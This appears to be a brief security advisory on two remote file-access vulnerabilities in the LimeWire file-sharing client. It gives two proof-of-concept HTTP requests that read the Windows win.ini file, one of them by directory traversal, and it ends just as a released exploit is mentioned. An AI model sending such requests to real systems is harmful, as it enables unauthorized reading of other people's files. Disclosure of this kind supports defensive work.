|
|
Lime Wire Multiple Remote Unauthorized Access Vulnerabilities
No exploit is required to leverage either of these issues. The following proof of concept requests have been provided: To retrieve the file 'win.ini' by exploiting the first issue the attacker must connect to the affected application over the offending port and issue the following request: GET /gnutella/res/C:\Windows\win.ini HTTP/1.1 User-Agent: I-AM-AN-ATTACKER/1.0 Host: 0.0.0.0:0 Accept: */* Connection: Keep-Alive To retrieve the same file with the second issue the attacker must connect to the affected application over the offending port and issue the following request: GET /magnet10/../../../../../Windows/Win.ini?Simple-test? User-Agent: I-AM-AN-ATTACKER/1.0 Host: 0.0.0.0:0 Accept: */* Connection: Keep-Alive The following proof of concept exploit has been released designed ot leverage the gnutella file access issue: |
|
Privacy Statement |